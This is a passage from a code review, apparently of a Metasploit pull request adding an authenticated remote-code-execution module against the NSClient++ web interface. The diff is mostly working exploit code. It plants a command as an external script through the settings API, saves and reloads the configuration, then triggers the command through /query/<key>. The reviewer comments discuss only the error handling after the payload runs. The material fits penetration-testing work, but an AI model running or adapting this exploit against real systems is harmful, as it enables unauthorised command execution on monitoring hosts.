modules/exploits/windows/http/nscp_authenticated_rce.rb

```diff
@@ -0,0 +1,219 @@
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          },
+        'DefaultOptions' => { 'SSL' => true }
+      )
+    )
+
+    register_options [
+      Opt::RPORT(8443),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with on NSClient web interface', nil])
+    ]
+  end
+
+  def configure_payload(token, cmd, key)
+    print_status('Configuring Script with Specified Payload . . .')
+
+    plugin_id = rand(1..10000).to_s
+
+    node = {
+      'path' => '/settings/external scripts/scripts',
+      'key' => key
+    }
+    value = { 'string_data' => cmd }
+    update = { 'node' => node, 'value' => value }
+    payload = [
+      {
+        'plugin_id' => plugin_id,
+        'update' => update
+      }
+    ]
+    json_data = { 'type' => 'SettingsRequestMessage', 'payload' => payload }
+
+    r = send_request_cgi({
+      'method' => 'POST',
+      'data' => JSON.generate(json_data),
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri('/settings/query.json')
+    })
+
+    if !r.body.to_s.include? 'STATUS_OK'
+      print_error('Error configuring payload. Hit error at: ' + endpoint)
+    end
+
+    print_status('Added External Script (name: ' + key + ')')
+    sleep(3)
+    print_status('Saving Configuration . . .')
+    header = { 'version' => '1' }
+    payload = [ { 'plugin_id' => plugin_id, 'control' => { 'command' => 'SAVE' } } ]
+    json_data = { 'header' => header, 'type' => 'SettingsRequestMessage', 'payload' => payload }
+
+    send_request_cgi({
+      'method' => 'POST',
+      'data' => JSON.generate(json_data),
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri('/settings/query.json')
+    })
+  end
+
+  def reload_config(token)
+    print_status('Reloading Application . . .')
+
+    send_request_cgi({
+      'method' => 'GET',
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri('/core/reload')
+    })
+
+    print_status('Waiting for Application to reload . . .')
+    sleep(10)
+    response = false
+    count = 0
+    until response
+      begin
+        sleep(2)
+        r = send_request_cgi({
+          'method' => 'GET',
+          'headers' => { 'TOKEN' => token },
+          'uri' => normalize_uri('/')
+        })
+        if !r.body.empty?
+          response = true
+        end
+      rescue StandardError
+        count += 1
+        if count > 10
+          fail_with(Failure::Unreachable, 'Application failed to reload. Nice DoS exploit!')
+        end
+      end
+    end
+  end
+
+  def trigger_payload(token, key)
+    print_status('Triggering payload, should execute shortly . . .')
+
+    send_request_cgi({
+      'method' => 'GET',
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri("/query/#{key}")
+    })
+  rescue StandardError
+    print_status('Timeout exceeded. Assuming your payload executed . . .')
```

Comment:
This `rescue` branch can be reached for more reasons than a timeout. A connection failure for example. Assuming that the payload executed seems like an unsafe assumption.

Reply:
How can I know for which reason this `rescue` branch was reached ?

Reply:
Best thing that jumps to mind is make the error message generic, something like:

```
print_error("Request could not be sent. #{e.class} error raised with message '#{e.message}'")
```

That'll let you know what error was thrown and aid in any future debugging needed

Reply:
Seems to be a good idea. I will also use `fail_with(Failure::Unknown, ...)` to prevent the following lines from being executing.